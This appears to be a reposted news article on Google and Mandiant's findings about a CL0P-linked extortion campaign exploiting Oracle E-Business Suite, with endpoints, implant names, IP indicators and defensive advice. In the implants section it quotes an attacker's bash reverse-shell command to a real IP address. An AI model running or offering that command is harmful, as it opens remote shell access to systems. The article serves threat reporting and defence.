The post Google reports 'mass amounts of customer data' exploited in extortion campaign appeared on BitcoinEthereumNews.com. Google has reported a large-scale extraction of customer data by bad actors, who it claimed are involved in an extortion scheme. Google Threat Intelligence and Mandiant tracked the exploitation operation to attackers that might be associated with the CL0P extortion group. Google’s Threat Intelligence Group (GTIG) and Mandiant have brought an extensive extortion campaign that exploits the vulnerabilities in Oracle’s E-Business Suite (EBS) to light. The extortion campaign has resulted in the theft of large volumes of customer data. They said the operation began on September 29, 2025 and involved a group claiming ties to the CL0P extortion brand. Google and Mandiant reveal zero-day exploitation  According to Google’s report, the attackers sent a “high volume” of emails to executives across multiple organizations, alleging breaches of their Oracle EBS environments and threatening to publish stolen data unless a ransom was paid.  The emails, sent from hundreds of compromised third-party accounts, included contact addresses, [email protected] and [email protected], previously linked to the CL0P data leak site. Google and Mandiant’s joint investigation found that the exploitation activity dates back to as early as July 2025, possibly linked to a zero-day vulnerability now tracked as CVE-2025-61882. In some cases, the attackers reportedly exfiltrated “a significant amount of data” from affected organizations. Oracle stated that the exploited flaws had been fixed in July, but later issued emergency updates on October 4 to address additional vulnerabilities. Oracle told its customers to use the latest critical patch updates and stressed that staying current on all patches is essential to prevent compromise. The CL0P extortion brand has been active since 2020 and is historically tied to the FIN11 cybercrime group. It has previously targeted managed file transfer systems like MOVEit, GoAnywhere, and Accellion FTA. Those campaigns followed a similar pattern of the mass exploitation of zero-day vulnerabilities, theft of… The post Google reports 'mass amounts of customer data' exploited in extortion campaign appeared on BitcoinEthereumNews.com. Google has reported a large-scale extraction of customer data by bad actors, who it claimed are involved in an extortion scheme. Google Threat Intelligence and Mandiant tracked the exploitation operation to attackers that might be associated with the CL0P extortion group. Google’s Threat Intelligence Group (GTIG) and Mandiant have brought an extensive extortion campaign that exploits the vulnerabilities in Oracle’s E-Business Suite (EBS) to light. The extortion campaign has resulted in the theft of large volumes of customer data. They said the operation began on September 29, 2025 and involved a group claiming ties to the CL0P extortion brand. Google and Mandiant reveal zero-day exploitation  According to Google’s report, the attackers sent a “high volume” of emails to executives across multiple organizations, alleging breaches of their Oracle EBS environments and threatening to publish stolen data unless a ransom was paid.  The emails, sent from hundreds of compromised third-party accounts, included contact addresses, [email protected] and [email protected], previously linked to the CL0P data leak site. Google and Mandiant’s joint investigation found that the exploitation activity dates back to as early as July 2025, possibly linked to a zero-day vulnerability now tracked as CVE-2025-61882. In some cases, the attackers reportedly exfiltrated “a significant amount of data” from affected organizations. Oracle stated that the exploited flaws had been fixed in July, but later issued emergency updates on October 4 to address additional vulnerabilities. Oracle told its customers to use the latest critical patch updates and stressed that staying current on all patches is essential to prevent compromise. The CL0P extortion brand has been active since 2020 and is historically tied to the FIN11 cybercrime group. It has previously targeted managed file transfer systems like MOVEit, GoAnywhere, and Accellion FTA. Those campaigns followed a similar pattern of the mass exploitation of zero-day vulnerabilities, theft of…

Google reports 'mass amounts of customer data' exploited in extortion campaign

Google has reported a large-scale extraction of customer data by bad actors, who it claimed are involved in an extortion scheme. Google Threat Intelligence and Mandiant tracked the exploitation operation to attackers that might be associated with the CL0P extortion group.

Google’s Threat Intelligence Group (GTIG) and Mandiant have brought an extensive extortion campaign that exploits the vulnerabilities in Oracle’s E-Business Suite (EBS) to light. The extortion campaign has resulted in the theft of large volumes of customer data. They said the operation began on September 29, 2025 and involved a group claiming ties to the CL0P extortion brand.

Google and Mandiant reveal zero-day exploitation 

According to Google’s report, the attackers sent a “high volume” of emails to executives across multiple organizations, alleging breaches of their Oracle EBS environments and threatening to publish stolen data unless a ransom was paid. 

The emails, sent from hundreds of compromised third-party accounts, included contact addresses, [email protected] and [email protected], previously linked to the CL0P data leak site.

Google and Mandiant’s joint investigation found that the exploitation activity dates back to as early as July 2025, possibly linked to a zero-day vulnerability now tracked as CVE-2025-61882. In some cases, the attackers reportedly exfiltrated “a significant amount of data” from affected organizations.

Oracle stated that the exploited flaws had been fixed in July, but later issued emergency updates on October 4 to address additional vulnerabilities. Oracle told its customers to use the latest critical patch updates and stressed that staying current on all patches is essential to prevent compromise.

The CL0P extortion brand has been active since 2020 and is historically tied to the FIN11 cybercrime group. It has previously targeted managed file transfer systems like MOVEit, GoAnywhere, and Accellion FTA. Those campaigns followed a similar pattern of the mass exploitation of zero-day vulnerabilities, theft of sensitive data, and extortion weeks later. 

At the time of the report, no new victims from this incident had appeared on CL0P’s data leak site. 

Complex, multi-stage Java implants

Google and Mandiant’s technical breakdown reveals that the attackers used multiple exploit chains targeting Oracle EBS components, including UiServlet and SyncServlet, to achieve remote code execution and plant multi-stage Java implants.

In July 2025 there was suspicious activity that involved HTTP requests to /OA_HTML/configurator/UiServlet. This suspicious activity was observed in another exploit that later surfaced in a Telegram group named “SCATTERED LAPSUS$ HUNTERS.” 

The leaked exploit made use of several advanced techniques to gain control over targeted servers, such as a server-side request forgery (SSRF), an authentication bypass, and a XSL template injection.

By August 2025, the attackers began using another tool called SyncServlet to make and run harmful templates inside the EBS database. These templates contained Base64-encoded XSL payloads that loaded Java-based malware directly into memory. 

Among the identified implants were GOLDVEIN.JAVA, a downloader that retrieved second-stage payloads from attacker-controlled command servers, and a multi-layered chain dubbed SAGE, which installed persistent Java servlet filters for further exploitation.

After breaching the system, the attackers used the EBS account “applmgr” to explore the system, collect network and system details, and then install more malicious files. The attackers also used shell commands such as ip addr, netstat -an, and bash -i >& /dev/tcp/200.107.207.26/53 0>&1.

The IP addresses 200.107.207.26 and 161.97.99.49 were identified in exploitation attempts, while 162.55.17.215:443 and 104.194.11.200:443 were listed as command-and-control servers for the GOLDVEIN.JAVA payload.

GTIG has not formally linked the operation to any known group, but the campaign shares similarities with FIN11, which is a financially motivated cybercrime group that was previously associated with CL0P ransomware and large-scale data theft operations. 

Mandiant also noted that one of the compromised accounts used to send the extortion emails had been used in earlier FIN11-related attacks.

Users are urged to be suspicious of EBS database tables XDO_TEMPLATES_B and XDO_LOBS, especially those with names beginning with “TMP” or “DEF”, and to block external internet traffic from EBS servers to prevent more data extortion.

The organizations also recommend close monitoring of HTTP requests to endpoints like /OA_HTML/SyncServlet and /OA_HTML/configurator/UiServlet, and analyzing memory dumps for evidence of in-memory Java payloads.

Google warned that CL0P-linked groups will almost certainly continue to dedicate their resources to acquiring zero-day exploits.

Get seen where it counts. Advertise in Cryptopolitan Research and reach crypto’s sharpest investors and builders.

Source: https://www.cryptopolitan.com/google-reports-customer-data-exploited/

Market Opportunity
MASS Logo
MASS Price(MASS)
$0.0003857
$0.0003857$0.0003857
-4.29%
USD
MASS (MASS) Live Price Chart
Disclaimer: The articles reposted on this site are sourced from public platforms and are provided for informational purposes only. They do not necessarily reflect the views of MEXC. All rights remain with the original authors. If you believe any content infringes on third-party rights, please contact [email protected] for removal. MEXC makes no guarantees regarding the accuracy, completeness, or timeliness of the content and is not responsible for any actions taken based on the information provided. The content does not constitute financial, legal, or other professional advice, nor should it be considered a recommendation or endorsement by MEXC.
Tags:

You May Also Like

The Federal Reserve cut interest rates by 25 basis points, and Powell said this was a risk management cut

The Federal Reserve cut interest rates by 25 basis points, and Powell said this was a risk management cut

PANews reported on September 18th, according to the Securities Times, that at 2:00 AM Beijing time on September 18th, the Federal Reserve announced a 25 basis point interest rate cut, lowering the federal funds rate from 4.25%-4.50% to 4.00%-4.25%, in line with market expectations. The Fed's interest rate announcement triggered a sharp market reaction, with the three major US stock indices rising briefly before quickly plunging. The US dollar index plummeted, briefly hitting a new low since 2025, before rebounding sharply, turning a decline into an upward trend. The sharp market volatility was closely tied to the subsequent monetary policy press conference held by Federal Reserve Chairman Powell. He stated that the 50 basis point rate cut lacked broad support and that there was no need for a swift adjustment. Today's move could be viewed as a risk-management cut, suggesting the Fed will not enter a sustained cycle of rate cuts. Powell reiterated the Fed's unwavering commitment to maintaining its independence. Market participants are currently unaware of the risks to the Fed's independence. The latest published interest rate dot plot shows that the median expectation of Fed officials is to cut interest rates twice more this year (by 25 basis points each), one more than predicted in June this year. At the same time, Fed officials expect that after three rate cuts this year, there will be another 25 basis point cut in 2026 and 2027.
Share
PANews2025/09/18 06:54
SEC clears framework for fast-tracked crypto ETF listings

SEC clears framework for fast-tracked crypto ETF listings

The post SEC clears framework for fast-tracked crypto ETF listings appeared on BitcoinEthereumNews.com. The Securities and Exchange Commission has approved new generic listing standards for spot crypto exchange-traded funds, clearing the way for faster approvals. Summary SEC has greenlighted new generic listing standards for spot crypto ETFs. Rule change eliminates lengthy case-by-case approvals, aligning crypto ETFs with commodity funds. Grayscale’s Digital Large Cap Fund and Bitcoin ETF options also gain approval. The U.S. SEC has approved new generic listing standards that will allow exchanges to fast-track spot crypto ETFs, marking a pivotal shift in U.S. digital asset regulation. According to a Sept. 17 press release, the SEC voted to approve rule changes from Nasdaq, NYSE Arca, and Cboe BZX, enabling them to list and trade commodity-based trust shares, including those holding spot digital assets, without submitting individual proposals for each product. A streamlined path for crypto ETFs Under the new rules, an ETF can be listed without SEC sign-off if its underlying asset trades on a market with surveillance-sharing agreements, has active CFTC-regulated futures contracts for at least six months, or already represents at least 40% of an existing listed ETF. This brings crypto ETFs in line with traditional commodity-based funds under Rule 6c-11, eliminating a process that could take up to 240 days. SEC chair Paul Atkins said the move was designed to “maximize investor choice and foster innovation” while ensuring the U.S. remains the leading market for digital assets. Jamie Selway, director of the division of trading and markets, called the framework “a rational, rules-based approach” that balances access with investor protection. First products already approved Alongside the new standards, the SEC cleared the listing of the Grayscale Digital Large Cap Fund, which tracks spot assets based on the CoinDesk 5 Index. It also approved trading of options tied to the Cboe Bitcoin U.S. ETF Index and its mini version, with…
Share
BitcoinEthereumNews2025/09/18 14:04
⁉️ Epstein, a convicted pedo, invested in Coinbase

⁉️ Epstein, a convicted pedo, invested in Coinbase

The post ⁉️ Epstein, a convicted pedo, invested in Coinbase appeared on BitcoinEthereumNews.com. The latest Epstein Files release has placed a variety of powerful
Share
BitcoinEthereumNews2026/02/07 04:07